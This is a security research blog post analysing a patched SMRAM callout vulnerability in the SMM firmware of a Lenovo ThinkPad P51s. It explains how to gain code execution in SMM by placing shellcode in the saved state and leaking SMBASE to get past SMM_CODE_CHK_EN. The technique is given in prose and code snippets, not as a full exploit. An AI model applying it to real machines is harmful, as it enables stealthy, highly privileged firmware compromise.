Through the SMM-class and a vulnerability found there.

Rédigé par Bruno Pujos - 14/01/2020 - dans Exploit - Téléchargement
In this blog post, a vulnerability in the code for the System Management Mode (SMM) in some Lenovo ThinkPad will be described. The vulnerability is a callout of SMRAM which allows to elevate privilege from kernel to SMM.

This article explains the step-by-step exploitation of the vulnerability including the mapping of the code in SMM through the usage of the SMM save state area.

Last summer, I finally started reversing the firmware of a computer I had since quite some times: a Lenovo ThinkPad P51s.

One of the reasons I was interested to look at this firmware is that the Independent Bios Vendor (IBV, companies which are specialized in developing firmware) seems to be Phoenix Technologies1 and not AMI as most firmware I had the occasion to look at. While most firmware use EDKII, a different IBV means a lot of code would be different.

I started by looking at the SMM drivers and quickly found a vulnerability: a callout of SMRAM in one of the SWSMI handlers. The vulnerability was patched in August by Lenovo and I could not find any advisory for this vulnerability.

UPDATE (2020-01-20): Since the publication of this blogpost we have been contacted by @yngweijw, he informed us that this was actually CVE-2019-6170 which he reported to Lenovo and that an advisory is indeed available. Congratulations to him for finding the vulnerability! Of course, you can disregard everything I am saying in the following article about silent patching :).

After a quick overview of SMM and UEFI (which you can safely ignore if you are already familiar with those) the vulnerability will be explained, followed by its exploitation which uses a technique previously published in another blog post: Code Check(mate) in SMM.

The following content was also publicly presented, and the slides are available here.

SMM and UEFI

UEFI is a specification which describes a standard set of interfaces for developing firmware and in particular BIOS. This firmware is one of the first things executed on the CPU at boot. It is in charge to initialize the hardware and set it up so an OS can start. This firmware is stored on a SPI flash present in the computer. The main advantage for an attacker to compromise this firmware is to achieve persistence on another place than the hard drive.

System Management Mode (SMM) is an Intel CPU mode. It is often called ring -2 as it is more privileged than the kernel or the hypervisor. SMM possesses its own memory space, called SMRAM, which is protected from access by other modes. SMM can be seen as a "secure world" not dissimilar to Trust Zone on ARM. However, its initial goal was not to provide security features but to handle computer specific requirements such as the Advanced Power Management (APM, which was replaced by ACPI). Today it is also used for protecting write access to the SPI Flash which contains the UEFI code.

mode_intel
"Transitions Among the Processor’s Operating Modes" from the Intel Manual

As can be seen in the previous schematic, SMM can be reached from any "normal" modes. SMM also supports 16bits, 32bits and 64bits, which makes it a kind of duplicate of all the other modes.

The transition between the normal modes and SMM is made when a System Management Interrupt (SMI) is triggered. When this happens, the processor switch to SMM: it will first save the current state of the CPU to a memory zone called the "Saved State" (necessary for being able to restore it later on) and then change the context including the instruction pointer for executing code in the SMRAM.

smram_map
Basic SMRAM map, SMBASE may not be alligned with the start of SMRAM.

SMRAM is a zone of physical RAM reserved by the UEFI firmware to be used by SMM. It is protected from "normal" access by the SMRR2 but also from DMA access and so on. The SMBASE is an address which must be inside this range and will be used for determining where the Saved State must be stored and at which position the instruction pointer should be set when switching to SMM. There is one SMBASE per core (for avoiding that when two cores switch at the same time they rewrite each other saved state) and there is no constraint on where those should be inside the SMRAM.

Several kinds of SMI exist but one in particular, the SoftWare SMI (SWSMI), is interesting for an attacker. A SWSMI is triggered when writing a value on the ioport 0xb2. After the switch is made the code will usually search for a SWSMI handler corresponding to the value written on the ioport. Those handlers are usually written in 64bits.

Finally, the code running in SMM (setup inside the SMRAM) is initialized by the UEFI firmware. In particular the SWSMI handlers are usually setup during the Driver eXecution Environment (DXE) phase of a UEFI boot. The DXE phase is composed of a few hundreds of drivers which are used for everything from hardware initialization to the implementation of a network stack.

Those drivers are provided with a set of services (in particular the EFI_BOOT_SERVICES and EFI_RUNTIME_SERVICES) located in normal mode which provide a set of basic features such as allocation and access to non-volatile variables.

The EFI_BOOT_SERVICES also allow to register and access protocols. Protocols allow the drivers to share functionality and are identified by a GUID. In practice as all memory access are made in physical memory during the UEFI boot, a protocol only associates a GUID to a pointer. Some of those protocols are public and documented (some in the UEFI specifications, some in edk2) but others are specific for each constructor. At the end of the DXE phase, the firmware will lock the SMRAM preventing access to it and will then try to start a bootloader for making the transition to the OS.

Vulnerability

Initial Reverse Engineering

When I began reversing the firmware, I started by identifying which protocol3 was used by the drivers for registering the SWSMI handlers. In this case, they used the classical EFI_SMM_SW_DISPATCH2_PROTOCOL which is defined in edk2 (MdePkg/Include/Protocol/SmmSwDispatch2.h) and is documented. Once I identified this protocol, I made a simple binary search for all the drivers using it and started reversing.

One of those drivers was named SmmOEMInt15, it is a really small driver with only 21 functions including one which registers a SWSMI:

// [...]
res = gSmst->SmmLocateProtocol(&UnkProtocolGuid, 0i64, &unk_protocol); // (1)
// [...]
swsmi_number = 0xFFFFFFFF;
if ((*unk_protocol)(&swsmi_oemint15_guid, &swsmi_number) < 0) // (2)
    return EFI_UNSUPPORTED;
RegisterContext.SwSmiInputValue = swsmi_number; // (3)
if (EFI_ERROR(EfiSmmSwDispatch2ProtocolInterface->Register( // (4)
          EfiSmmSwDispatch2ProtocolInterface,
          swsmi_handler_unk_func,
          &RegisterContext,
          &DispatchHandle))
    return EFI_UNSUPPORTED;
return EFI_SUCCESS;

The previous snippet of code does the following:

  1. Retrieve an undocumented protocol (unk_protocol) with the GUID ff052503-1af9-4aeb-83c4-c2d4ceb10ca3 (UnkProtocolGuid) using the EFI_SMM_SYTEM_TABLE2 (gSmst) which contains some services for SMM.
  2. Call the first function with a new unknown GUID eee19e05-079a-4d17-8f46-cf811260db26 (&swsmi_oemint15_guid) and use it for retrieving a number (swsmi_number).
  3. The swsmi_number retrieved in the previous step is then setup in the context used later in order to register the SWSMI handler, this is the value which must be written on the IOPort 0xb2.
  4. Finally, the EFI_SMM_SW_DISPATCH2_PROTOCOL is used for registering the function swsmi_handler_unk_func as the SWSMI handler.

The first problem of this code was the usage of an unknown protocol for getting the SWSMI number. This protocol was used by several (but not all) drivers registering SWSMI and it would be necessary to reverse it before performing any tests.

SystemSwSmiAllocatorSmm

By searching for the GUID of the undocumented protocol (ff052503-1af9-4aeb-83c4-c2d4ceb10ca3) it was easy to find the driver which implement it: SystemSwSmiAllocatorSmm. This driver is also quite simple with even fewer functions.

The first action of this driver is to allocate several buffers in normal world, one of them is particularly interesting as it is registered as a configuration table with the GUID 7E791691-5752-4392-B888-EFF9C74F5D77. A configuration table is accessible to all drivers and associates a pointer to a GUID, they are usually used for passing data from one driver to another while protocols are used to pass capabilities, in practice they both associate a GUID to a pointer.

Once those initial steps and a little initialization are done, the driver registers the protocol which interests us, I named it SystemSwsmiAllocatorProtocol from the name of the driver. This protocol contains 3 functions : get_swsmi_num_and_add2list, get_swsmi_num_from_guid and add_swsmi_to_list_no_check (those are obviously the names I gave them).

Basically this driver allows to associate a SWSMI number to a GUID. It is possible to request the driver to find the next available SWSMI number (using the first function) or to provide it (using the third). The second function allows simply to get the SWSMI number from the GUID.

Those associations are stored in a linked list in normal world which is referenced by the configuration table registered at the beginning. This allows an application outside of SMM to get the correct SWSMI number for the functionality it wishes to use. This was probably made for avoiding having SWSMI number collision between different drivers with other components registering SWSMI handlers.

With all that information, it is quite easy to retrieve the SWSMI number dynamically. Using chipsec4 from an UEFI shell I was able to match the SWSMI numbers and the GUID:

  1. Retrieve the configuration table ct_swsmi_allocator from the GUID 7E791691-5752-4392-B888-EFF9C74F5D77.
  2. At ct_swsmi_allocator + 0x38 is a pointer on the head of the double linked list (this is a guard there is no actual data behind this element). It is possible to iterate on this list until the head is reached again.
  3. For each element elt of the list there is a few interesting data:
    • At elt-0x8 is a magic 0x4E415353.
    • The SWSMI number is at elt+0x10 on a qword.
    • The GUID is at elt+0x18.

Once we have retrieved the correlation between the GUID and SWSMI number, it becomes possible to trigger the code of the SWSMI handler. It is now time to look at it.

The vulnerability

The first action of the SWSMI handler from SmmOEMInt15 is to retrieve the value of the RSI register from the saved state. This is done by using EFI_MM_CPU_PROTOCOL (previously named EFI_SMM_CPU_PROTOCOL) which is also documented and part of edk2 (MdePkg/Include/Protocol/MmCpu.h). This protocol will search the value saved by the CPU in the saved state for the register and return it. This is a really interesting start for a SWSMI handler as this value is an actual user input.

Even more interesting this value is then used as a pointer on a structure, and the first two bytes of this structure are used as an enum for a switch calling different handlers. I started to quickly reverse the handlers but I never actually finished as I found a quite interesting piece of code when looking at the handler 0x3E00.

The first thing that this handler does is to calculate a value from two fields in the structure, setting it in a global variable (controlled) before calling an internal function:

base_ptr = 0x10 * rsi_val->local_used; // local_used off. 0x1C (2 bytes)
controlled = (base_ptr + rsi_val->for_global); // for_global off. 0x10 (2 bytes)
v14 = handler_internal_3E00(base_ptr);

The handler_internal_3E00 function in itself begins with two really interesting basic blocks:

callout-oemint15
Start of the handler_internal_3E00 function

The first thing it does is to check if the value at *(controlled+2) is at 0 and if it is the case it will, after some weird stuff (yes that's indeed a write of 0xFFFEFFFE at the address 0x4... as we are in physical memory without any protection this will not create a crash), call the EFI_BOOT_SERVICES.LocateHandleBuffer function.

The problem of calling this function from SMM is that the EFI_BOOT_SERVICES is a table of services located in the normal world. An attacker can simply change the address in the EFI_BOOT_SERVICES table and get an arbitrary call. This type of vulnerability is usually named a callout of SMRAM and they are basically equivalent to calling userland code from kernelland.

Exploitation

In the past (around 2017~2018), a callout of SMRAM was really simple to exploit: it was enough to change the code (or the function pointer in this case) before triggering the SWSMI. However, the SMM_CODE_CHK_EN mitigation has started to be commonly used since then and it is indeed activated on my Lenovo P51s.

SMM_CODE_CHK_EN is a SMEP-like feature for SMM: if code from outside of the SMRAM (defined by the SMRR) is executed while in SMM the computer will basically just crash. In practice, SMM_CODE_CHK_EN is a MSR initialized by the firmware during the boot. It can be locked and, once it is, it can't be disabled. As it is a SMEP-like feature the usual kernel bypass will work but there are a few disadvantages to use them:

  • a firmware is not as standard as a kernel: a trick will probably not be portable,
  • SMM is a big blackbox from the normal world point of view and data communication is supposedly limited,
  • there is no ASLR but addresses will depend of the computer and firmware version.

For all of those reasons an exploit may not work as expected on another vulnerable firmware.

At this point if we try to trigger the code of the 0x3E00 handler with the callout of SMRAM the following will happen:

call_out_smram
Triggering the callout
  1. We trigger the SWSMI with the correct number, the correct values in RSI and in memory for reaching the callout.
  2. The CPU will save the current state somewhere in SMRAM.
  3. Some code will be executed (including switching to 64bits) and our SWSMI handler will be called.
  4. The 0x3E00 handler will search the EFI_BOOT_SERVICES.LocateHandleBuffer function pointer in memory.
  5. And call the function.
  6. And then... it will just crash. Because SMM_CODE_CHK_EN is activated the call to code in normal world will never be executed, and so the original code without any modification does not even work.

Now that we know that, the goal is to be able to execute our code in SMM in a stable way and, hopefully, easily portable between two different firmware with the same vulnerability. For doing this I used a technique which I have previously explained in detail in another blog post: Code Check(mate) in SMM.

The basic idea is to profit of the saved state which is setup by the CPU when switching to SMM. The saved state is always located at SMBASE + 0xFC00 and contains numerous general purpose registers allowing us to control (in the best case) 0x80 bytes of memory:

typedef struct _ssa_normal_reg {
    UINT64 r15; // start at SMBASE + 0xFF1C
    UINT64 r14; // 0xFF24
    UINT64 r13; // 0xFF2C
    UINT64 r12; // 0xFF34
    UINT64 r11; // 0xFF3C
    UINT64 r10; // 0xFF44
    UINT64 r9; // 0xFF4C
    UINT64 r8; // 0xFF54
    UINT64 rax; // 0xFF5C
    UINT64 rcx; // 0xFF64
    UINT64 rdx; // 0xFF6C
    UINT64 rbx; // 0xFF74
    UINT64 rsp; // 0xFF7C
    UINT64 rbp; // 0xFF84
    UINT64 rsi; // 0xFF8C
    UINT64 rdi; // 0xFF94
} ssa_normal_reg_t;

As everything use physical addresses and no memory protection are enabled, the content of the saved state will be executable and 0x80 bytes is way more than enough for putting a shellcode which will allow us to gain full control.

At that point the idea is the following:

call_out_smram_exploit
Bypass of CodeChk idea
  1. First we rewrite the address of the LocateHandleBuffer in the EFI_BOOT_SERVICES structure with the address where our registers are located in the shellcode.
  2. Then we trigger the SWSMI with our shellcode stored in the registers. We still have to comply with all the conditions necessary to call our handler, but it will leave us way enough space for our shellcode.
  3. The CPU will then save our state in SMRAM mapping our shellcode for us.
  4. Our SWSMI handler will be called, himself calling the 0x3E00 handler.
  5. The function pointer for EFI_BOOT_SERVICES.LocateHandleBuffer will be fetched, but instead the address in the saved state will be retrieved.
  6. Our shellcode will be called and as the saved state is located inside the SMRAM, SMM_CODE_CHK_EN will not be triggered.

This idea is pretty simple and allows us to map our shellcode inside the SMRAM without being dependent from the firmware's code. Sadly there is a little problem with it: we do not know SMBASE which is used for computing the base address of the saved state.

Getting the value of SMBASE has been a classical problem for exploiting SMM vulnerabilities since quite some time. Usually there are three main techniques for retrieving it: you can guess it, you can bruteforce it or you can read the MSR IA32_SMBASE which contains its value. The first two techniques have a huge probability of making the computer crash and sadly the IA32_SMBASE register can only be read from SMM creating a chicken and egg problem. Because of this I started to look for a better technique which would allow to get the SMBASE reliably and without the control of the hardware.

The SMBASE is initialized in the PiSmmCpuDxeSMM driver, this driver is open-source and available in edk2. When initializing the SMBASE the first thing it does is calculate the size necessary to reserve. Because there needs to be a SMBASE per CPU it is not enough to reserve 0x10000, but for RAM space optimization the driver avoids reserving that much memory per CPU. A TileSize is calculated in the driver for determining how much the SMBASE should be shifted, while the calculation is made dynamically in the driver in practice it is always shifted by 0x2000 bytes. We now know the position of the SMBASE compared to each other and that 0x10000 + TileSize * (number_of_cpu - 1) bytes of memory will be reserved.

To reserve the memory, the driver uses a wrapper on the SmmAllocatePages function and does not specify a particular address where to map this memory. By default, SmmAllocatePages will first try to look in a freelist and without result will take the highest available address. At that point of the boot there has been no reason to free a chunk of memory that big, meaning we can safely ignore the freelist. The last interesting point about SmmAllocatePages is that it is also used for mapping SMM drivers, and when the allocation for the SMBASE is done we know that the last driver allocated is the PiSmmCpuDxeSMM driver. At that point we know that the memory look like this:

mem_layout2
Memory layout around the SMBASEs

We still do not have SMBASE but we start to have a good idea of what is around it, and it happens that PiSmmCpuDxeSMM registers a normal world protocol:

Status = SystemTable->BootServices->InstallMultipleProtocolInterfaces (
    &gSmmCpuPrivate->SmmCpuHandle,
    &gEfiSmmConfigurationProtocolGuid, &gSmmCpuPrivate->SmmConfiguration,
    NULL
    );

The gSmmCpuPrivate->SmmConfiguration is located inside the PiSmmCpuDxeSMM driver and, because it is registered with the EFI_BOOT_SERVICES, this pointer and its associated GUID (gEfiSmmConfigurationProtocolGuid) will be stored in normal world. Using the EFI_BOOT_SERVICES.LocateProtocol we can retrieve this pointer. As weird as it seems this is actually made "on purpose": this protocol is used by normal world drivers during the boot phase, at the moment they do use it, the SMRAM is not yet locked. However, it could be possible to avoid such a leak by uninstalling this protocol at the same time the SMRAM is locked. As this driver is part of edk2 most firmware integrate it and this technique is basically portable between different constructors. If you wish for a more detailed description of the leak, one is available in my previous blog post.

Using this leak, we can calculate the base address of PiSmmCpuDxeSMM (base = leak - off), use it to deduce the SMBASE address (base - 0x10000 - tilesize * (numcpu - 1)) and from that calculation get the saved state address. A problem I encountered while using this technique was the actual number of cpu (numcpu) did not correspond to the reality and it took me some time to figure out this bug. It is in fact possible to get the actual number used for the calculation using the EfiPiMpServicesProtocol which is accessible from normal world.

At this point we have everything needed for the exploit:

call_out_smram_exploit_with_leak
Full steps of exploitation

First we need to get the address of the saved state:

  1. Use the EFI_BOOT_SERVICES.LocateProtocol function for retrieving the EfiSmmConfigurationProtocol.
  2. From the protocol we get the leak in the PiSmmCpuDxeSMM driver.
  3. Which allows to calculate the SMBASE and deduce the address of the saved state where our shellcode will be.

Then we need to trigger the exploit:

  1. We start by rewriting the address of the EFI_BOOT_SERVICES.LocateHandleBuffer function with the value we just calculated.
  2. We trigger our SWSMI with our shellcode stored in the registers.
  3. The CPU will map our shellcode at the address we have calculated before.
  4. The SWSMI for SmmOEMInt15 is called and in particular the 0x3E00 handler.
  5. While trying to get the LocateHandleBuffer address, it will retrieve the address where our shellcode has been mapped.
  6. And finally our shellcode will be called giving us code execution in SMM.

Conclusion

This bug was silently patched for the Lenovo P51s in August 2019. The patch is really quite simple: the handler for the command 0x3E00 has been deleted. However, like we have seen previously, the original code of this handler would have made the computer crash and it is possible it was removed because it did not work anymore or because the feature was not used anymore. This is a perfect example of the interest of the SMM_CODE_CHK_EN hardening: even if it is still pretty easy to bypass (we still use a leak), it is forcing BIOS developers to remove the callouts of SMRAM and because of it this kind of vulnerability is dying.

Finally, it is also worth noting that this vulnerability is not sufficient to gain persistence on the SPI Flash. The Lenovo P51s firmware makes usage of Intel Boot Guard (IBG), another recent mechanism which allows to perform code signing and integrity check of the firmware code at boot time. A SMM vulnerability is today only the first step and another one allowing to bypass IBG would be needed for being persistent.

  • 1. Phoenix Technologies is an IBV, their firmware is based on EDKII and called Phoenix SecureCore Technology (SCT). A simple search of the strings for Phoenix or SecureCore usually allows to identify their firmware. In my experience the most common IBV are: AMI, Phoenix and Insyde.
  • 2. The System Management Range Registers (SMRR) are 2 MSR (Model Specific Register) which allow to define the range of physical memory protected from normal access. Those MSR are usually the simplest way to determine the SMRAM range, they should be set by the firmware once the initialization of the SMM has ended.
  • 3. Several protocols have existed over time and some constructors (OEM or IBV) define their own. This is actually done by this Lenovo firmware in the LenovoSecuritySmiDispatch driver which registers an undocumented protocol with GUID 9f5e8c5e-0373-4a08-8db5-1f913316c5e4 for providing other drivers a way to register handlers through a unique SWSMI, but this is not relevant for this blog post.
  • 4. Chipsec is an open-source tool allowing to dump the UEFI firmware and providing a lot of utilities for analyzing and testing the security of the UEFI firmware. I usually launch it from a UEFI Shell as it allows to avoid problems related to the interaction with the OS. Another really good tool to have is UEFITool which allows to parse, extract and replace the content of a firmware. Those two tools and a good disassembler are usually enough for starting to audit an UEFI firmware.